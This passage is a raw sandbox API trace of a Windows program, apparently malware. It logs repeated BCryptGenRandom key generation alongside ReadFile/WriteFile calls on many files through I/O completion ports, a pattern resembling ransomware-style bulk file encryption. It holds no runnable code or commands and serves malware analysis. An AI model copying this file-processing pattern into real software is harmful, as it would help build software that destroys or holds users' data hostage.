| out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.453] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.453] CloseHandle (hObject=0xec) returned 1 [0210.454] free (_Block=0x3df0008) [0210.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0210.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.464] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0210.464] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.464] free (_Block=0x3e305b8) [0210.464] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.464] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.464] free (_Block=0x1fa91d0) [0210.464] free (_Block=0x1fa2ed8) [0210.464] free (_Block=0x1fa90b8) [0210.464] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.464] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.465] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.501] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.501] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0210.501] CloseHandle (hObject=0xec) returned 1 [0210.501] free (_Block=0x3df0008) [0210.501] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff) Thread: id = 13 os_tid = 0x8d4 [0069.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0076.980] CloseHandle (hObject=0x3ac) returned 1 [0076.981] free (_Block=0x1fb18c0) [0076.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0076.995] CloseHandle (hObject=0x3a8) returned 1 [0077.000] free (_Block=0x2031ed0) [0077.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.008] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6d1f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.020] CloseHandle (hObject=0x3a0) returned 1 [0077.024] free (_Block=0x1ff1e60) [0077.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.036] CloseHandle (hObject=0x3ac) returned 1 [0077.037] free (_Block=0x1fb18c0) [0077.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0077.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.040] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.040] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0077.040] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0077.040] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0077.040] free (_Block=0x1ff1e60) [0077.040] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0077.040] calloc (_Count=0x82, _Size=0x4) returned 0x3db00b8 [0077.040] free (_Block=0x1ff1e60) [0077.040] free (_Block=0x3db00b8) [0077.040] free (_Block=0x77d800) [0077.041] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0077.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.054] CloseHandle (hObject=0x3ac) returned 1 [0077.054] free (_Block=0x1fb18c0) [0077.054] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0077.061] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.061] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.061] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0077.065] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0077.065] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0077.065] free (_Block=0x77d800) [0077.065] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0077.065] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0077.065] free (_Block=0x2031ed0) [0077.065] free (_Block=0x2031fe0) [0077.065] free (_Block=0x77d908) [0077.065] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.066] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.146] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0077.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.152] ReadFile (in: hFile=0x3ac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xce8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0077.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0077.160] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0xd8b, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0077.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.159] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x1c9e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.258] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.258] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.258] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0079.258] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0079.258] free (_Block=0x77d800) [0079.258] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0079.258] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0079.259] free (_Block=0x1ff1930) [0079.259] free (_Block=0x1ff1a40) [0079.259] free (_Block=0x77d908) [0079.259] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.261] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x24730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0079.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.267] CloseHandle (hObject=0x3ac) returned 1 [0079.267] free (_Block=0x1ff1e60) [0079.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.272] CloseHandle (hObject=0x3bc) returned 1 [0079.272] free (_Block=0x1fb18c0) [0079.273] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.299] calloc (_Count=0x40, _Size=0x4) returned 0x3df0008 [0079.299] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.299] free (_Block=0x3df0008) [0079.299] calloc (_Count=0x41, _Size=0x4) returned 0x3df0008 [0079.299] calloc (_Count=0x82, _Size=0x4) returned 0x77d800 [0079.300] free (_Block=0x3df0008) [0079.300] free (_Block=0x77d800) [0079.300] free (_Block=0x1ff1e60) [0079.300] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0079.300] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.301] WriteFile (in: hFile=0x3c4, lpBuffer=0x3df015c*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0128) returned 1 [0079.301] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.342] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xf63, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.343] CloseHandle (hObject=0x3c4) returned 1 [0079.346] free (_Block=0x1fb18c0) [0079.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.355] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.356] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.356] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.356] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.356] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.357] free (_Block=0x1ff1e60) [0079.357] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.357] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.357] free (_Block=0x1ff1e60) [0079.357] free (_Block=0x1ff1930) [0079.357] free (_Block=0x77d800) [0079.357] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.358] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.376] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x11a3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.377] CloseHandle (hObject=0x3c4) returned 1 [0079.378] free (_Block=0x1fb18c0) [0079.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.386] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.387] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.387] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.387] free (_Block=0x1ff1e60) [0079.387] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.387] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.388] free (_Block=0x1ff1e60) [0079.388] free (_Block=0x1ff1930) [0079.388] free (_Block=0x77d800) [0079.388] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.388] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.389] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.404] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xab3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.404] CloseHandle (hObject=0x3c4) returned 1 [0079.408] free (_Block=0x1fb18c0) [0079.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.410] CloseHandle (hObject=0x3c4) returned 1 [0079.410] free (_Block=0x1fb18c0) [0079.410] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0079.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.419] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.419] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0079.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0079.420] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.420] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.420] free (_Block=0x1ff1e60) [0079.420] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.420] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.421] free (_Block=0x1ff1e60) [0079.421] free (_Block=0x1ff1930) [0079.421] free (_Block=0x77d800) [0079.421] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: 